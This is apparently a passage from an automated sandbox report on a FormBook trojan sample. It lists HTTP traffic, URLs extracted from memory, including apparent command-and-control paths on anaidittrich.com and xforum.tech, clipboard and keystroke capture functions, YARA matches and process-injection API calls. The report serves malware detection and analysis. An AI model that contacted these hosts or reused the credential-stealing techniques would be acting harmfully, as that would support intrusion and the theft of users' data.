41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:55:48 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:55:51 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 77 75 72 64 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 6e 64 66 75 6c 20 64 65 73 69 67 6e 20 61 6e 64 20 61 72 74 20 70 72 6f 6a 65 63 74 73 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003724000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005414000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2283662036.0000000038524000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531540694.0000000002AF8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com/qpwk/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004222000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005F12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005D80000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?VZ=qzwLUJ3Xbb28&r8=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3530968033.0000000002C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2170716950.0000000007D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000004546000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000006236000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3533362762.0000000007D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.0000000003A48000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3531860991.0000000005738000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E6425A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E64458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E64458
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E6425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E6425A
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E50219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E50219
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E7CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E7CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: This is a third-party compiled AutoIt script.0_2_00DF3B4C
            Source: 20-EM-00- PI-INQ-3001.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dd06b72d-d
            Source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0f0a8c36-d
            Source: 20-EM-00- PI-INQ-3001.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_710c951e-9
            Source: 20-EM-00- PI-INQ-3001.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd768ba6-8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C1A3 NtClose,1_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
